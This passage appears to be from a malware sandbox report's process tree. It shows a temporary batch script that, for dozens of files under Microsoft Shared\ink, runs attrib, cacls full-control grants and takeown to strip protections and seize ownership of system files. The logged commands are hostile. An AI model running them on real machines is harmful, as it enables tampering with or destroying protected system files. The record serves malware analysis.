    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml"
    3⤵
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml""
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml"
    3⤵
    - Views/modifies file attributes
    PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml" /E /G Admin:F /C
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml"
    3⤵
    PID:1036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml" /E /G Admin:F /C
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml"
    3⤵
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml""
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml"
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml""
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml"
    3⤵
    PID:676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml"
    3⤵
    - Modifies file permissions
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml""
  2⤵
  PID:1064
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml"
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml"
    3⤵
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml" /E /G Admin:F /C
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml"
    3⤵
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml"
    3⤵
    - Views/modifies file attributes
    PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml"
    3⤵
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml""
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml" /E /G Admin:F /C
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml"
    3⤵
    PID:1468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml" /E /G Admin:F /C
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml"
    3⤵
    - Modifies file permissions
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml""
  2⤵
  PID:904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml"
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml"
    3⤵
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml""
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml"
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml"
    3⤵
    - Modifies file permissions
    PID:1552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml""
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml"
    3⤵
    - Views/modifies file attributes
    PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml"
    3⤵
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml""
  2⤵
  PID:744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml"
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml" /E /G Admin:F /C
    3⤵
    PID:676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml"
    3⤵
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml""
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml"
    3⤵
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml""
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml"
    3⤵
    - Views/modifies file attributes
    PID:1860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml" /E /G Admin:F /C
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml"
    3⤵
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml""
  2⤵
  PID:1876
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml"
    3⤵
    - Views/modifies file attributes
    PID:1768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml"
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\symbase.xml""
  2⤵
  PID:1980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\symbase.xml"
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\symbase.xml" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\symbase.xml"
    3⤵
    - Modifies file permissions
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml""
  2⤵
  PID:1468
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml"
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml" /E /G Admin:F /C
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml"
    3⤵
    - Modifies file permissions
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml""
  2⤵
  PID:760
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml"
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml"
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml""
  2⤵
  PID:1112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml" /E /G Admin:F /C
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml"
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\tipresx.dll.mui""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\tipresx.dll.mui"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\tipresx.dll.mui"
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui""
  2⤵
  PID:240
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui"
    3⤵
    - Drops file in Program Files directory
    PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui"
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\tipresx.dll.mui""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\tipresx.dll.mui"
    3⤵
    PID:612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\tipresx.dll.mui"
    3⤵
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat""
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat" /E /G Admin:F /C
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat"
    3⤵
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat"
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat" /E /G Admin:F /C
    3⤵
    PID:368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat"
    3⤵
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat"
    3⤵
    PID:388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat"
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat" /E /G Admin:F /C
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat"
    3⤵
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat""
  2⤵
  PID:556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat""
  2⤵
  PID:1192
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat"
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat" /E /G Admin:F /C
    3⤵
    PID:472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat""
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat"
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat"
    3⤵
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat""
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat"
    3⤵
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml""
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml"
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml" /E /G Admin:F /C
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml"
    3⤵
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml""
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml" /E /G Admin:F /C
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml"
    3⤵
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml""
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml"
    3⤵
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml""
  2⤵
  PID:888
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml"
    3⤵
    - Views/modifies file attributes
    PID:1896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml" /E /G Admin:F /C
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml"
    3⤵
    PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml""
  2⤵
  PID:1400
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml" /E /G Admin:F /C
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml"
    3⤵
    PID:1576
